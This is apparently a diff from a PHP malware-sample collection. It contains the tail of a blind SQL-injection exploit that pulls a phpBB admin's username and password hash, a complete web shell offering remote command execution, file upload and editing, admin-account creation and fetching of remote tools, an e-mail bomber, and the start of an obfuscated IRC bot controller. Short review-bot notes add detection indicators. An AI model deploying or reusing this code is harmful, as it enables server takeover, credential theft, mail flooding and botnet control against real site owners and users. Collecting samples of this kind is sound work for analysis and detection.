if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
echo "sql -> ".$sql."\n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: ".$cookie." \r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]\r\n";sleep(2);break;}
}
if ($i==255) {die("Exploit failed...");}
$j++;
}
echo "--------------------------------------------------------------------\r\n";
echo "admin -> ".$admin."\r\n";
echo "password (md5) -> ".$password."\r\n";
echo "--------------------------------------------------------------------\r\n";
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}
if (is_hash($password)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>
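Review bot: The injected value travels in the POST body (`$data.="&ip=".$sql;`), not in the URL, and the section has no note telling an analyst that body inspection is needed. An access log alone would show only repeated `POST …memberlist.php?…mode=searchuser` requests carrying the constant `ip=%5C%27` in the query string. The header comment states that a global-moderator account is required, so these requests follow a login POST to `ucp.php?mode=login` and carry that session's cookie. On the application side the general remedy is to validate `ip` as an address before it is used in a query; the affected phpBB code is not on the page, so this is not tied to a specific line there. Suggested annotation: `// indicator: authenticated POST to memberlist.php?mode=searchuser with body field ip= containing UNION SELECT (payload is upper-cased by strtoupper)`.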

BIN
PHP/Exploit.PHP.Userpic.a Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 7.2 KiB

503
PHP/Exploit.PHP.e Normal file

@ -0,0 +1,503 @@
<html>
<head>
<meta http-equiv="Content-Language" content="pt-br">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="AoD">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>By xIgOr > AoD > CMD > File List</title>
<style type="text/css">
A:link {text-decoration:none}
A:visited {text-decoration:none}
A:hover {text-decoration:underline}
A:active {text-decoration:underline}
</style>
</head>
<body style="font-family: Tahoma; font-size: 10px">
#udp @ irc.mildnet.org
<!--
@set_time_limit(0);
$string = $_SERVER['QUERY_STRING'];
$mhost = 'http://legiaourbana.itafree.com/cmd/list.txt?';
$host_all = explode("$mhost", $string);
$s1 = $host_all[0];
$fstring = $_SERVER['PHP_SELF']."?".$s1.$mhost;
$OS = @PHP_OS;
$IpServer = '127.0.0.1';
$UNAME = @php_uname();
$PHPv = @phpversion();
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode = "<i>OFF</i>"; }
else { $SafeMode = "<i>$SafeMode</i>"; }
$btname = 'backtool.txt';
$bt = 'http://www.full-comandos.com/jobing/r0nin';
$dc = 'http://www.full-comandos.com/jobing/dc.txt';
$newuser = '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup &quot;Administrators&quot; /add Admin;net localgroup &quot;Users&quot; /del Admin';
// Java Script
echo "<script type=\"text/javascript\">";
echo "function ChMod(chdir, file) {";
echo "var o = prompt('Chmod: - Exemple: 0777', '');";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=chmod&chdir=' + chdir + '&file=' + file + '&chmod=' + o + \"\";";
echo "}";
echo "}";
echo "function Rename(chdir, file, mode) {";
echo "if (mode == 'edit') {";
echo "var o = prompt('Rename file '+ file + ' for:', '');";
echo "}";
echo "else {";
echo "var o = prompt('Rename dir '+ file + ' for:', '');";
echo "}";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=rename&chdir=' + chdir + '&file=' + file + '&newname=' + o + '&mode=' + mode +\"\";";
echo "}";
echo "}";
echo "function Copy(chdir, file) {";
echo "var o = prompt('Copied for:', '/tmp/' + file);";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=copy&chdir=' + chdir + '&file=' + file + '&fcopy=' + o + \"\";";
echo "}";
echo "}";
echo "function Mkdir(chdir) {";
echo "var o = prompt('Which name?', 'NewDir');";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=mkdir&chdir=' + chdir + '&newdir=' + o + \"\";";
echo "}";
echo "}";
echo "function Newfile(chdir) {";
echo "var o = prompt('Which name?', 'NewFile.txt');";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=newfile&chdir=' + chdir + '&newfile=' + o + \"\";";
echo "}";
echo "}";
echo "</script>";
// End JavaScript
/* Functions */
function cmd($CMDs) {
$CMD[1] = '';
exec($CMDs, $CMD[1]);
if (empty($CMD[1])) {
$CMD[1] = shell_exec($CMDs);
}
elseif (empty($CMD[1])) {
$CMD[1] = passthru($CMDs);
}
elseif (empty($CMD[1])) {
$CMD[1] = system($CMDs);
}
elseif (empty($CMD[1])) {
$handle = popen($CMDs, 'r');
while(!feof($handle)) {
$CMD[1][] .= fgets($handle);
}
pclose($handle);
}
return $CMD[1];
}
if (@$_GET['chdir']) {
$chdir = $_GET['chdir'];
} else {
$chdir = getcwd()."/";
}
if (@chdir("$chdir")) {
$msg = "<font color=\"#008000\">Entrance&nbsp;in&nbsp;the&nbsp;directory,&nbsp;OK!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error&nbsp;to&nbsp;enters&nbsp;it&nbsp;in&nbsp;the&nbsp;directory!</font>";
$chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']);
}
$chdir = str_replace(chr(92), chr(47), $chdir);
if (@$_GET['action'] == 'upload') {
$uploaddir = $chdir;
$uploadfile = $uploaddir. $_FILES['userfile']['name'];
if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $_FILES['userfile']['name'])) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$_FILES['userfile']['name']}</font>,&nbsp;the&nbsp;archive&nbsp;is&nbsp;validates&nbsp;and&nbsp;was&nbsp;loaded&nbsp;successfully.</font>";
} else {
$msg = "<font color=\"#FF0000\">Error&nbsp;when&nbsp;copying&nbsp;archive.</font>";
}
}
elseif (@$_GET['action'] == 'mkdir') {
$newdir = $_GET['newdir'];
if (@mkdir("$chdir"."$newdir")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$newdir}</font>,&nbsp;directory&nbsp;created successfully.</font>";
} else {
$msg = "<font color=\"#FF0000\">Error&nbsp;to&nbsp;it&nbsp;creates&nbsp;directory.</font>";
}
}
elseif (@$_GET['action'] == 'newfile') {
$newfile = $_GET['newfile'];
if (@touch("$chdir"."$newfile")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$newfile}</font>,&nbsp;created successfully!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error&nbsp;to&nbsp;tries&nbsp;it&nbsp;creates&nbsp;archive.</font>";
}
}
elseif (@$_GET['action'] == 'del') {
$file = $_GET['file']; $type = $_GET['type'];
if ($type == 'file') {
if (@unlink("$chdir"."$file")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>,&nbsp;successfully&nbsp;excluded&nbsp;archive!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error&nbsp;to&nbsp;it&nbsp;I&nbsp;excluded&nbsp;archive!</font>";
}
} elseif ($type == 'dir') {
if (@rmdir("$chdir"."$file")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>,&nbsp;successfully&nbsp;excluded&nbsp;directory!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error&nbsp;to&nbsp;it&nbsp;I&nbsp;excluded&nbsp;directory!</font>";
}
}
}
elseif (@$_GET['action'] == 'chmod') {
$file = $chdir.$_GET['file']; $chmod = $_GET['chmod'];
if (@chmod ("$file", $chmod)) {
$msg = "<font color=\"#008000\">Chmod&nbsp;of</font>&nbsp;<font color=\"#000080\">{$_GET['file']}</font>&nbsp;<font color=\"#008000\">moved&nbsp;for</font>&nbsp;<font color=\"#000080\">$chmod</font>&nbsp;<font color=\"#008000\">successfully.</font>";
} else {
$msg = '<font color=\"#FF0000\">Error&nbsp;when&nbsp;moving&nbsp;chmod.</font>';
}
}
elseif (@$_GET['action'] == 'rename') {
$file = $_GET['file']; $newname = $_GET['newname'];
if (@rename("$chdir"."$file", "$chdir"."$newname")) {
$msg = "<font color=\"#008000\">Archive</font>&nbsp;<font color=\"#000080\">{$file}</font>&nbsp;<font color=\"#008000\">named for</font>&nbsp;<font color=\"#000080\">{$newname}</font>&nbsp;<font color=\"#008000\">successfully!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error&nbsp;to&nbsp;it&nbsp;nominates&nbsp;archive.</font>";
}
}
elseif (@$_GET['action'] == 'copy') {
$file = $chdir.$_GET['file']; $copy = $_GET['fcopy'];
if (@copy("$file", "$copy")) {
$msg = "<font color=\"#000080\">{$file}</font>,&nbsp;<font color=\"#008000\">copied for</font> <font color=\"#000080\">{$copy}</font> <font color=\"#008000\">successfully!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error&nbsp;when&nbsp;copying</font>&nbsp;<font color=\"#000000\">{$file}</font>&nbsp;<font color=\"#FF0000\">for</font>&nbsp;<font color=\"#000000\">{$copy}</font></font>";
}
}
/* Parte Atualiza 02:48 12/2/2006 */
elseif (@$_GET['action'] == 'cmd') {
if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; }
if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; }
$cmd = stripslashes(trim($cmd));
$result_arr = cmd($cmd);
$afim = count($result_arr); $acom = 0; $msg = '';
$msg .= "<p style=\"color: #000000;text-align: center;font-family: 'Lucida Console';font-size: 12px;margin 2\">Results:&nbsp;<b>".$cmd."</b></p>";
if ($result_arr) {
while ($acom <= $afim) {
$msg .= "<p style=\"color: #008000;text-align: left;font-family: 'Lucida Console';font-size: 12px;margin 2\">&nbsp;".@$result_arr[$acom]."</p>";
$acom++;
}
}
else {
$msg .= "<p style=\"color: #FF0000;text-align: center;font-family: 'Lucida Console';font-size: 12px;margin 2\">Erro ao executar comando.</p>";
}
}
elseif (@$_GET['action'] == 'safemode') {
if (@!extension_loaded('shmop')) {
echo "Loading... module</br>";
if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) {
@dl('php_shmop.dll');
} else {
@dl('shmop.so');
}
}
if (@extension_loaded('shmop')) {
echo "Module: <b>shmop</b> loaded!</br>";
$shm_id = @shmop_open(0xff2, "c", 0644, 100);
if (!$shm_id) { echo "Couldn't create shared memory segment\\\\\\\\n"; }
$data="\\\\\\\\x00";
$offset=-3842685;
$shm_bytes_written = @shmop_write($shm_id, $data, $offset);
if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of data\\\\\\\\n"; }
if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; }
echo passthru("id");
shmop_close($shm_id);
} else { echo "Module: <b>shmop</b> not loaded!</br>"; }
}
elseif (@$_GET['action'] == 'zipen') {
$file = $_GET['file'];
$zip = @zip_open("$chdir"."$file");
$msg = '';
if ($zip) {
while ($zip_entry = zip_read($zip)) {
$msg .= "Name: " . zip_entry_name($zip_entry) . "\\\\\\\\n";
$msg .= "Actual Filesize: " . zip_entry_filesize($zip_entry) . "\\\\\\\\n";
$msg .= "Compressed Size: " . zip_entry_compressedsize($zip_entry) . "\\\\\\\\n";
$msg .= "Compression Method: " . zip_entry_compressionmethod($zip_entry) . "\\\\\\\\n";
if (zip_entry_open($zip, $zip_entry, "r")) {
echo "File Contents:\\\\\\\\n";
$buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry));
echo "$buf\\\\\\\\n";
zip_entry_close($zip_entry);
}
echo "\\\\\\\\n";
}
zip_close($zip);
}
}
elseif (@$_GET['action'] == 'edit') {
$file = $_GET['file'];
$conteudo = '';
$filename = "$chdir"."$file";
$conteudo = @file_get_contents($filename);
$conteudo = htmlspecialchars($conteudo);
$back = $_SERVER['HTTP_REFERER'];
echo "<p align=\"center\">Editing&nbsp;{$file}&nbsp;...</p>";
echo "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse\" width=\"100%\" id=\"editacao\">";
echo "<tr>";
echo "<td width=\"100%\">";
echo "<form method=\"POST\" action=\"{$fstring}&amp;action=save&amp;chdir={$chdir}&amp;file={$file}\">";
echo "<!--webbot bot=\"SaveResults\" u-file=\"_private/form_results.csv\" s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><p align=\"center\">";
print "<textarea rows=\"18\" name=\"S1\" cols=\"89\" style=\"font-family: Verdana; font-size: 10pt; border: 1px solid #000000\">{$conteudo}</textarea></p>";
echo "<p align=\"center\">";
echo "<input type=\"submit\" value=\"Save\" name=\"B2\" style=\"font-family: Tahoma; font-size: 10px; border: 1px solid #000000\">&nbsp;";
echo "<input type=\"button\" value=\"Closes Publisher\" Onclick=\"javascript:window.location='{$fstring}&amp;chdir={$chdir}'\" name=\"B1\" style=\"font-family: Tahoma; font-size: 10px; border: 1px solid #000000\">&nbsp;";
echo "</form>";
echo "</td>";
echo "</tr>";
echo "</table>";
}
elseif (@$_GET['action'] == 'save') {
$filename = "$chdir".$_GET['file'];
$somecontent = $_POST['S1'];
$somecontent = stripslashes(trim($somecontent));
if (is_writable($filename)) {
@$handle = fopen ($filename, "w");
@$fw = fwrite($handle, $somecontent);
@fclose($handle);
if ($handle && $fw) {
$msg = "<font color=\"#000080\">{$_GET['file']}</font>,&nbsp;<font color=\"#008000\">edited&nbsp;successfully!</font>";
}
} else {
$msg = "<font color=\"#000000\">{$_GET['file']},</font>&nbsp;<font color=\"#FF0000\">cannot&nbsp;be&nbsp;written!</font>";
}
}
// Informações
$cmdget = '';
if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }
if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }
$cmdget = htmlspecialchars($cmdget);
function asdads() {
$asdads = '';
if (@file_exists("/usr/bin/wget")) { $asdads .= "wget&nbsp;"; }
if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch&nbsp;"; }
if (@file_exists("/usr/bin/curl")) { $asdads .= "curl&nbsp;"; }
if (@file_exists("/usr/bin/GET")) { $asdads .= "GET&nbsp;"; }
if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx&nbsp;"; }
return $asdads;
}
echo "<form method=\"POST\" name=\"cmd\" action=\"{$fstring}&amp;action=cmd&amp;chdir=$chdir\">";
echo "<fieldset style=\"border: 1px solid #000000; padding: 2\">";
echo "<legend>Informações</legend>";
echo "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse; font-family: Tahoma; font-size: 10px\" width=\"100%\">";
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Sistema:</b>&nbsp;</td></p>";
echo "<td width=\"92%\">&nbsp;{$OS}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Uname:&nbsp;</b></td></p>";
echo "<td width=\"92%\">&nbsp;{$UNAME}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>PHP:&nbsp;</b></td></p>";
echo "<td width=\"92%\">&nbsp;{$PHPv},&nbsp;<b>safe mode:</b>&nbsp;{$SafeMode}</td>";
echo "</tr>";
if (strtoupper(substr($OS, 0,3) != 'WIN')) {
$Methods = asdads();
if ($Methods == '') { $Methods = "???"; }
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Methods:&nbsp;</b></td></p>";
echo "<td width=\"92%\">&nbsp;{$Methods}</td>";
echo "</tr>";
}
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Ip:&nbsp;</b></td></p>";
echo "<td width=\"92%\">&nbsp;{$IpServer}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Command:&nbsp;</b></td></p>";
echo "<td width=\"92%\">&nbsp;<input type=\"text\" size=\"70\" name=\"cmd\" value=\"{$cmdget}\" style=\"font-family: Tahoma; font-size: 10 px; border: 1px solid #000000\">&nbsp;<input type=\"submit\" name=\"action\" value=\"Send\" style=\"font-family: Tahoma; font-size: 10 px; border: 1px solid #000000\"></td>";
echo "</tr>";
echo "</table>";
echo "</fieldset></form>";
// Dir
echo "<form method=\"POST\" action=\"{$fstring}&amp;action=upload&amp;chdir=$chdir\" enctype=\"multipart/form-data\">";
echo "<!--webbot bot=\"FileUpload\" u-file=\"_private/form_results.csv\" s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><fieldset style=\"border: 1px solid #000000; padding: 2\">";
if (is_writable("$chdir")) {
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
echo "<legend>Dir&nbsp;<b>YES</b>:&nbsp;{$chdir}&nbsp;-&nbsp;<a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a>&nbsp;<a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a>&nbsp;<a href=\"{$fstring}&amp;action=cmd&amp;chdir={$chdir}&amp;cmd=$newuser\">[Remote Access]</a></legend>";
} else {
echo "<legend>Dir&nbsp;<b>YES</b>:&nbsp;{$chdir}&nbsp;-&nbsp;<a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a>&nbsp;<a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a>&nbsp;<a href=\"{$fstring}&amp;action=backtool&amp;chdir={$chdir}&amp;write=yes\">[BackTool]</a></legend>";
}
}
else {
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
echo "<legend>Dir&nbsp;NO:&nbsp;{$chdir}&nbsp;-&nbsp;<a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a>&nbsp;<a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a>&nbsp;<a href=\"{$fstring}&amp;action=cmd&amp;chdir={$chdir}&amp;cmd={$newuser}\">[Remote Access]</a></legend>";
} else {
echo "<legend>Dir&nbsp;NO:&nbsp;{$chdir}&nbsp;-&nbsp;<a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a>&nbsp;<a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a>&nbsp;<a href=\"{$fstring}&amp;action=backtool&amp;chdir={$chdir}&amp;write=no\">[BackTool]</a></legend>";
}
}
if (@!$handle = opendir("$chdir")) {
echo "&nbsp;I&nbsp;could&nbsp;not&nbsp;enters&nbsp;in&nbsp;the&nbsp;directory,&nbsp;<a href=\"{$fstring}\">click here!</a>&nbsp;for&nbsp;return&nbsp;to&nbsp;the&nbsp;original&nbsp;directory!</br>";
}
else {
echo " <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse; font-family: Tahoma; font-size: 10px\" width=\"100%\">";
echo " <tr>";
echo " <td width=\"100%\" style=\"font-family: Tahoma; font-size: 10px\" colspan=\"4\">&nbsp;Upload:";
echo " <input type=\"file\" name=\"userfile\" size=\"91\" style=\"font-family: Tahoma; font-size: 10px; border-style: solid; border-width: 1\">";
echo " <input type=\"submit\" value=\"Send\" name=\"B1\" style=\"font-family: Tahoma; font-size: 10px; border: 1px solid #000000\"></td>";
echo " </tr>";
echo " <tr>";
echo " <td width=\"100%\" style=\"font-family: Tahoma; font-size: 10px\" colspan=\"4\">&nbsp;</td>";
echo " </tr>";
echo " <tr>";
echo " <td width=\"100%\" style=\"font-family: Tahoma; font-size: 10px\" colspan=\"4\">";
if (@!$msg) {
echo " <p align=\"left\">Messages</td>";
} else {
echo " <p align=\"left\">$msg</td>";
}
echo " </tr>";
echo " <tr>";
echo " <td width=\"100%\" colspan=\"4\">&nbsp;</td>";
echo " </tr>";
echo " <tr>";
echo " <td width=\"9%\">&nbsp;Perms</td>";
echo " <td width=\"49%\">&nbsp;File </td>";
echo " <td width=\"10%\">&nbsp;Size </td>";
echo " <td width=\"32%\">&nbsp;Commands</td>";
echo " </tr>";
$colorn = 0;
while (false !== ($file = readdir($handle))) {
if ($file != '.') {
if ($colorn == 0) {
$color = "style=\"background-color: #FFCC66\"";
}
elseif ($colorn == 1) {
$color = "style=\"background-color: #C0C0C0\"";
}
if (@is_dir("$chdir"."$file")) {
$file = $file.'/';
$mode = 'chdir';
} else {
$mode = 'edit';
}
if (@substr("$chdir", strlen($chdir) -1, 1) != '/') {
$chdir .= '/';
}
if ($file == '../') {
$lenpath = strlen($chdir); $baras = 0;
for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } }
$chdir_ = explode("/", $chdir);
$chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir);
}
$perms = @fileperms ("$chdir"."$file");
if ($perms == '') {
$perms = '???';
}
$size = @filesize ("$chdir"."$file");
$size = $size / 1024;
$size = explode(".", $size);
if (@$size[1] != '') {
$size = $size[0].'.'.@substr("$size[1]", 0, 2);
} else {
$size = $size[0];
}
if ($size == 0) {
if ($mode == 'chdir') {
$size = '???';
}
}
echo "<tr>";
echo "<td width=\"9%\" $color>&nbsp;$perms</td>";
if (@is_writable ("$chdir"."$file")) {
if ($mode == 'chdir') {
if ($file == '../') {
echo "<td width=\"49%\" $color>&nbsp;<b><a href=\"{$fstring}&amp;chdir=$chdirpox\">$file</a></b></td>";
} else {
echo "<td width=\"49%\" $color>&nbsp;<b><a href=\"{$fstring}&amp;chdir={$chdir}{$file}\">$file</a></b></td>";
}
} else {
if (is_readable("$chdir"."$file")) {
echo "<td width=\"49%\" $color>&nbsp;<b><a href=\"{$fstring}&amp;action=edit&amp;chdir=$chdir&amp;file=$file\">$file</a></b></td>";
} else {
echo "<td width=\"49%\" $color>&nbsp;<b>$file</b></td>";
}
}
}
else {
if ($mode == 'chdir') {
if ($file == '../') {
echo "<td width=\"49%\" $color>&nbsp;<a href=\"{$fstring}&amp;chdir=$chdirpox\">$file</a></td>";
} else {
echo "<td width=\"49%\" $color>&nbsp;<a href=\"{$fstring}&amp;chdir={$chdir}{$file}\">$file</a></td>";
}
} else {
if (@is_readable("$chdir"."$file")) {
echo "<td width=\"49%\" $color>&nbsp;<a href=\"{$fstring}&amp;action=edit&amp;chdir=$chdir&amp;file=$file\">$file</a></td>";
} else {
echo "<td width=\"49%\" $color>&nbsp;$file</td>";
}
}
}
echo "<td width=\"10%\" $color>&nbsp;$size&nbsp;KB</td>";
if ($mode == 'edit') {
echo "<td width=\"32%\" $color>&nbsp;<a href=\"#{$file}\" onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">[Rename]</a>&nbsp;<a href=\"{$fstring}&amp;action=del&amp;chdir={$chdir}&amp;file={$file}&amp;type=file\">[Del]</a>&nbsp;<a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">[Chmod]</a>&nbsp;<a href=\"#{$file}\" onclick=\"Copy('{$chdir}', '{$file}')\">[Copy]</a></td>";
} else {
echo "<td width=\"32%\" $color>&nbsp;<a href=\"#{$file}\" onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">[Rename]</a>&nbsp;<a href=\"{$fstring}&amp;action=del&amp;chdir={$chdir}&amp;file={$file}&amp;type=dir\">[Del]</a>&nbsp;<a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">[Chmod]</a>&nbsp;[Copy]</td>";
}
echo "</tr>";
if ($colorn == 0) {
$colorn = 1;
}
elseif ($colorn == 1) {
$colorn = 0;
}
}
}
closedir($handle);
}
?>
</table>
</fieldset></form>
<p align="center">
<a href="http://validator.w3.org/check?uri=referer"><img
src="http://www.w3.org/Icons/valid-html401"
alt="Valid HTML 4.01 Transitional" height="31" width="88"></a>
</p>
</body>
</html>

69
PHP/Flooder.PHP.MailSpam Normal file

@ -0,0 +1,69 @@
<?php
if (!$mailstart) {
?>
<html>
<head>
<title>[- Xp|01t3R's -] - E-Mail Bomber</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body bgcolor="#FFFFFF" text="#000000">
<h3><font face="Verdana, Arial, Helvetica, sans-serif"><b>[*CyBeR tErRoRiStS*]
- E-Mail Bomber <br>
</b></font></h3>
<form name="own" method="post" action="<? echo $PHP_SELF; ?>">
<p><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><b>To:
<input type="text" name="to">
<input type="hidden" name="mailstart" value="2">
<br>
From:
<input type="text" name="from">
</b></font></p>
<p><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2">Subject :
<input type="text" name="subject" size="100">
<br>
<br>
Message:<br>
<textarea name="message" rows="5" cols="100"></textarea>
</font></b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
<br>
<b>Number Of Times To Send:</b>
<input type="text" name="times" size="4">
<br>
<input type="submit" name="Send" value="Send">
<input type="reset" name="Reset" value="Reset">
</font></p>
</form>
<h3><font face="Verdana, Arial, Helvetica, sans-serif"><b> </b></font> </h3>
</body>
</html>
<?
} else {
$i = 0;
while ($i < $times) {
$headers .= "From: $from<$from>\n";
$headers .= "X-Sender: <$from>\n";
$headers .= "X-Mailer: PHP\n"; //mailer
$headers .= "X-Priority: 1\n"; //1 UrgentMessage, 3 Normal
$headers .= "Return-Path: <$from>\n";
$headers .= "Content-Type: text/html; charset=iso-8859-1\n";
$headers .= "cc:\n"; // CC to
$headers .= "bcc:"; // BCCs to, separete
mail($to, $subject, $message, $headers) or die("Could Not Send Message");
$i++;
}
die("Finished Sending Message $times Times to $to");
}
?>
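Review bot: This sample lands with no analyst annotation, and the two traits a responder would key on are easy to miss in the raw listing. I would record them in a sidecar note rather than in the file itself, since editing the specimen changes its hash: `reads $mailstart, $to, $from, $subject, $message and $times as bare globals, never from $_POST, so it only acts where register_globals-style import of form fields is in effect` and `$headers is appended to inside the while loop and never reset, so the Nth message carries N copies of the From / X-Sender / X-Priority: 1 / X-Mailer: PHP block`. For detection, the fixed `X-Mailer: PHP` plus `X-Priority: 1` pair with repeated header blocks in outbound mail, and the `E-Mail Bomber` title string in web content, are usable indicators. The unbounded `$times` loop around `mail()` is also the argument for per-account rate limits on the host's local mail submission.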

128
PHP/HackTool.PHP.Botctl.a Normal file

@ -0,0 +1,128 @@
<? set_time_limit(0); ini_set("max_execution_time",0); set_magic_quotes_runtime(0); ini_set('output_buffering',0);
error_reporting(0); ignore_user_abort(); $aec12e0af93cb5 = array ( "po" => 8080, "sp" => "uJijk4iVsIXRmQ==",
"ch" => "aFaw", "ke" => "spd1iYSUqA==", "ha" => "dG1qQk1halK/nE6N", "pa" => "fpekVYhVdlWQXGLBXnBWWId1hll1WVWJVFpYh1tahVs=",
"tr" => "*", "mrnd" => 9, "mo" => "cqtrig==", "ve" => "dmFyWA==" ); function tc8a89c2c306fb($m341be97d9aff9) {
$m341be97d9aff9 = str_replace(" ", "", $m341be97d9aff9); return $m341be97d9aff9; } function ob5d21085bf2c0($m341be97d9aff9) {
$m341be97d9aff9 = base64_decode(tc8a89c2c306fb($m341be97d9aff9)); return $m341be97d9aff9; } function rfc35fdc70d5fc() {
global $aec12e0af93cb5; $see11cbb19052e = array(); $td707b8140a662 = ""; $b59b514174bffe = array("sqytlpaKo4a/lI6MnaWIiI+zUYSvkA==","sqywiZKPpZLTk4zDmG6aiYakkZRuhpCR","rpihlYyTr5LWVKHDi6SRl0+jko4=","rZytgpFPr5TDlI7MmW6FiQ==","sKJuhYdPopDTi5bHlKVRhoY=","tWeuVFZSclfDVI7CVKKPmYasjI+lUYOJ","vaOokJFUbpPOi5jClLNRhoY=","sqywiZKPpVeMipjHlm6RiZU=","sqytlpaKo5eMipjHlm6RiZU=");
shuffle($b59b514174bffe); if(($j351a1d2ad68bc = fsockopen(jf9feaa9bcab30($b59b514174bffe[0]),$aec12e0af93cb5['po'],$k70106d0d82151,$d809b1abe3f111,15))) {
$m8052146769b14 = ad988971435842($aec12e0af93cb5['mrnd']); if (strlen($aec12e0af93cb5['sp'])>0) { q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UEFTUw==")." ".jf9feaa9bcab30($aec12e0af93cb5['sp']));
} q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("VVNFUg==")." ".gfb0daa8f01135($aec12e0af93cb5['mrnd'])." 127.0.0.1 localhost :$m8052146769b14");
q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14"); while (!feof($j351a1d2ad68bc)) {
$f7fabc1404929c = trim(fgets($j351a1d2ad68bc,512)); $h6e2baaf3b97db = explode(" ",$f7fabc1404929c);
